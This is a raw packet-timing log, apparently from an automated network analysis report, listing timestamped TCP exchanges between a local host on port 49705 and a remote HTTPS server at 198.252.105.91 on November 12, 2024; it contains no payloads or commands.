                                                                                                                  Nov 12, 2024 15:28:10.572757959 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:10.573033094 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:10.626131058 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:10.628914118 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:10.675333977 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:10.753108978 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:10.803350925 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:10.803391933 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:10.850123882 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:10.868890047 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:10.868910074 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:10.868952990 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:10.868971109 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:10.868988991 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:10.868998051 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:10.869020939 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:10.869035006 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:10.869056940 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:10.870721102 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:10.870728970 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:10.870768070 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:10.870778084 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:10.870806932 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:10.870831013 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:10.870855093 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:10.914120913 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:10.984571934 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:10.984599113 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:10.984646082 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:10.984674931 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:10.984684944 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:10.984716892 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:10.984736919 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:10.984752893 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:10.985543013 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:10.985565901 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:10.985604048 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:10.985618114 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:10.985650063 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:10.985666990 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:10.987262011 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:10.987282038 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:10.987339020 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:10.987353086 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:10.987394094 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:10.989118099 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:10.989136934 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:10.989181042 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:10.989192963 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:10.989214897 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:10.989233017 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.100461006 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.100502968 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.100605011 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.100646019 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.100684881 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.101207972 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.101227045 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.101283073 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.101298094 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.101320982 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.101341009 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.102029085 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.102051020 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.102128029 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.102142096 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.102180004 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.102523088 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.102544069 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.102603912 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.102613926 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.102639914 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.102657080 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.112319946 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.112350941 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.112410069 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.112441063 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.112469912 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.112488985 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.115930080 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.115955114 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.116034985 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.116055012 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.116107941 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.116137028 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.116152048 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.116184950 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.116189957 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.116242886 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.116257906 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.229635000 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.229661942 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.229733944 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.229758978 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.229784966 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.229801893 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.229829073 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.229846954 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.229926109 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.229931116 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.229968071 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.230127096 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.230144024 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.230170965 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.230175018 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.230212927 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.231046915 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.231067896 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.231132030 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.231137991 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.231182098 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.231553078 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.231570005 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.231620073 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.231625080 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.231661081 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.232316017 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.232336044 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.232398033 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.232404947 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.232450962 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.232530117 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.232546091 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.232594013 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.232599020 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.232641935 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.233356953 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.233376026 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.233433008 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.233438015 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.233475924 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.234249115 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.234278917 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.234317064 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.234322071 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.234355927 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.234411955 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.234431982 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.234442949 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.234447956 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.234467030 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.234504938 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.235255957 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.235272884 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.235327959 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.235332966 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.235375881 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.235775948 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.235794067 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.235838890 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.235843897 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.235871077 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.235877991 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.236589909 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.236608028 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.236682892 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.236687899 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.236730099 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.236757040 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.236772060 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.236809015 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.236813068 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.236838102 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.236860037 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.331110954 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.331144094 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.331240892 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.331269979 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.331327915 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.331507921 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.331532955 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.331581116 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.331587076 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.331621885 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.331629992 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.331882954 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.331898928 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.332005978 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.332012892 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.332060099 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.332320929 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.332336903 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.332401991 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.332406998 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.332449913 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.332935095 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.332950115 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.333003044 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.333009005 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.333055019 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.333425999 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.333441973 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.333498001 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.333503962 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.333549023 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.333719015 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.333733082 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.333791018 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.333795071 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.333836079 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.334273100 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.334287882 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.334342003 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.334347010 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.334395885 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.334445953 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.334466934 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.334515095 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.334520102 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.334546089 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.334583998 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.335062981 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.335082054 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.335130930 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.335135937 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.335177898 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.335591078 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.335609913 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.335655928 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.335659981 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.335681915 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.335707903 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.335948944 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.335966110 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.336030006 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.336034060 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.336100101 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.336257935 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.336272001 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.336321115 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.336324930 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.336368084 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.336786032 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.336803913 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.336862087 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.336867094 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.336910963 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.337620020 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.337636948 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.337694883 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.337701082 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.337763071 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.338215113 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.338228941 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.338275909 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.338282108 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.338308096 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.338315964 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.345072031 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.345097065 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.345139980 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.345160007 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.345302105 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.345302105 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.345453978 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.345472097 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.345523119 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.345532894 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.345577955 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.346021891 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.346038103 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.346098900 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.346110106 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.346147060 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.346879959 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.346899033 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.346947908 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.346962929 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.347002983 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.347145081 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.347160101 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.347206116 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.347213030 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.347246885 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.446202993 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.446235895 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.446305990 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.446340084 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.446362019 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.446379900 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.446382046 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.446394920 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.446419001 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.446451902 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.447299957 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.447321892 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.447354078 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.447360992 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.447380066 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.447406054 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.447868109 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.447886944 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.447958946 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.447967052 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.448003054 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.448518991 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.448533058 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.448596954 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.448602915 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.448643923 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.448846102 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.448862076 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.448914051 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.448919058 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.448960066 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.449104071 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.449120998 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.449171066 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.449174881 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.449218988 CET49705443192.168.2.5198.252.105.91
                                                                                                                  Nov 12, 2024 15:28:11.449680090 CET44349705198.252.105.91192.168.2.5
                                                                                                                  Nov 12, 2024 15:28:11.449701071 CET44349705198.252.105.91192.168.2.5
